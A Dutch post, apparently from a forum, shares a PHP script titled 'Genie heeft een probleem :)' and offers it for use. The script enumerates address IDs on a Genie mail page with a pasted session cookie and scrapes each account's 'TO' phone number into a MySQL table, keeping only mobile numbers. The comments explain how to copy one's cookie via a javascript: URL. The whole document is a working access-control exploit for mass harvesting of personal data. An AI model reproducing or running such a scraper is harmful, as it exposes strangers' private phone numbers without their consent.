Hiero het script:
<html>
<?
/*
// Hiero zie je de opbouw van de dbase.. moet je zelf maar ff
// kijken of je het ermee eens bent :)
// De mysqlregel wordt dan:
// create table tabelnaam (id int(14) AUTO_INCREMENT NOT NULL
// DEFAULT '0', telnummer varchar(12), addressid int(10), UNIQUE ID (id), PRIMARY KEY (id));
+-----------+------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+-----------+------------+------+-----+---------+----------------+
| id | int(14) | | PRI | 0 | auto_increment |
| telnummer | varchar(12)| YES | | NULL | |
| addressid | int(10) | YES | | NULL | |
+-----------+------------+------+-----+---------+----------------+
3 rows in set (0.00 sec)
*/
?>
<head>
<title>Genie heeft een probleem :)</title>
</head>
<body>
<?
//instellingen
$host = ""; //Hier dus de computer waar de dbase draait (bv. localhost)
$user = ""; //En de uesrname voor het account
$passwd = ""; //Misschien had je het al door, het wachtwoord :)
$dbase = ""; //Dbase naam (bv. telnummers)
//connecten
$db = mysql_connect("$host", "$user", "$passwd");
mysql_select_db("$dbase",$db);
//Ga verder bij het laatste addressid uit de dbase
$last = mysql_query("SELECT MAX(addressid) FROM $dbase", $db);
$result = @mysql_result($last, 0);
if(!$result)
{
$result = '320000000';
}
for($i=$result; $i <= 329999999; $i++)
{
nummer($i);
echo "<br>";
}
function nummer($addressid)
{
//global
global $i;
//instellingen
$host = ""; //Hier dus de computer waar de dbase draait (bv. localhost)
$user = ""; //En de uesrname voor het account
$passwd = ""; //Misschien had je het al door, het wachtwoord :)
$dbase = ""; //Dbase naam (bv. telnummers)
//connecten
$db = mysql_connect("$host", "$user", "$passwd");
mysql_select_db("$dbase",$db);
$first = urldecode("name=\"TO\" value=\"");
$last = urldecode("\"><font");
$connection = fsockopen ('beveiligd.genie.nl',
80,
&$errorNumber,
&$errorString,
10);
if ($connection)
{
//set non-blocking mode
set_socket_blocking($connection, false);
//tell server what document we want
fputs ($connection,
"GET /gmail_mdl/send.hnspl?action=address&addressid=".$addressid." HTTP/1.0");
fputs ($connection, "\r\n");
// Hiero ff je cookie invullen zoals hiero is gedaan
// (dit is dus geen geldige) Wil je echter wel een geldig
// koekje dan moet je ff inloggen bij genie en dan in je
// browser intypen javascript:document.write(document.cookie)
// Dat dus kopieren en pasteren, hiero
fputs ($connection, "Cookie:
GS-Known=3675362%2F981223226%2F981201626.%2FOdkqpcL%2BiCduXtkyzWDpw;
GS-User=3675362%2F981223226%2F981201626.%2FOdkqpcL%2BiCduXtkyzWDpw");
fputs ($connection, "\r\n\r\n");
$headerStart = 0;
$headerEnd = 0;
while (!feof($connection))
{
$currentLine = fgets ($connection, 128);
//$line = fgets ($connection, 1024);
if ($headerEnd)
{
//this is the html from the page
//0628335700
if (eregi ("".$first."(.*)".$last."", $currentLine, $out))
{
$nummer = $out[1];
mysql_query("insert into $dbase values('','$nummer','$i')", $db);
mysql_query("delete from $dbase where telnummer not like '06%'", $db);
echo $nummer;
break;
}
}
else if ( ereg("^HTTP", $currentLine) )
{
//came to the start of the header
$headerStart = 1;
}
else if ( $headerStart && ereg("^[\n\r\t ]*$", $currentLine) )
{
//came to the end of the header
$headerEnd = 1;
}
else
{
//this is the header, if you want it...
}
}
fclose ($connection);
}
else
{
echo "$errstr ($errno)\n";
}
}
?>
</body>
</html>
Veel plezier ermee,
Groetjes (aan genie)
Flip^
